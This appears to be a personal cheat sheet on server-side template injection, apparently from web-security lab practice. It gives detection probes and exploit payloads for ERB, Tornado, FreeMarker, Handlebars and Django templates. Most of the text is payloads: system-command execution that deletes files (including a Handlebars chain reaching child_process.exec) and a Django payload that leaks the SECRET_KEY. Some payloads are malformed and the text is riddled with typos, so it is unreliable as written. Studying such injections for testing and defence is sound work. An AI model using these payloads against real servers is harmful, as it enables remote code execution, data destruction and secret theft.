Server Side Templete Injection

Methods to find SSTI
1. Firstly find the place where the template is reflected
2. Supply irregular input and try to get template type information
3. use the arbitry payload to check presence of SSTI
4. If SSTI is positive then supply corrosponding payloads to exploit

• ERB (Ruby) Template injection

* The arbitary payloads to be URL encoded first to execute

| ERB TEMPLATE |

<%= 7 * 7 %> | arbitary code to check SSTI
%= system("rm /home/carlos/morale.txt") %> | arbitary code to remove files

• Tornado Template Injection

{{7*7}} = 49 | arbitary code to check template injection

<div data-gb-custom-block data-tag="import"></div>

{{os.system('whoami')}}
{{os.system('rm('/your/directory/here')')}} | arbitary payload

• Freemaker Template Injection

${foobar} | this arbiraty command will return error and confirms SSTI
The new() in the freemaker template is too dangerous | hackers can exploit to run RCE 
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm /home/carlos/morale.txt") }

• Website uses handle bars

wrtz{{#with "s" as |string|}}
    {{#with "e"}}
        {{#with split as |conslist|}}
            {{this.pop}}
            {{this.push (lookup string.sub "constructor")}}
            {{this.pop}}
            {{#with string.split as |codelist|}}
                {{this.pop}}
                {{this.push "return require('child_process').exec('rm /home/carlos/morale.txt');"}}
                {{this.pop}}
                {{#each conslist}}
                    {{#with (string.sub.apply 0 codelist)}}
                        {{this}}
                    {{/with}}
                {{/each}}
            {{/with}}
        {{/with}}
    {{/with}}
{{/with}}

code by @Zombiehelp54. | URL Encode it first

• SSTI in Django based Templates

{{7*7}} | pass the arbitary code to check the SSTI and template vesrion

By default the Django template has the debug property which can be called by 

<div data-gb-custom-block data-tag="debug"></div> 

Observing the outputs and the settings parameter is seen there not secqurely embedded
{{settings.SECRET_KEY}} | passing settings to revel the contents of the hidden parameters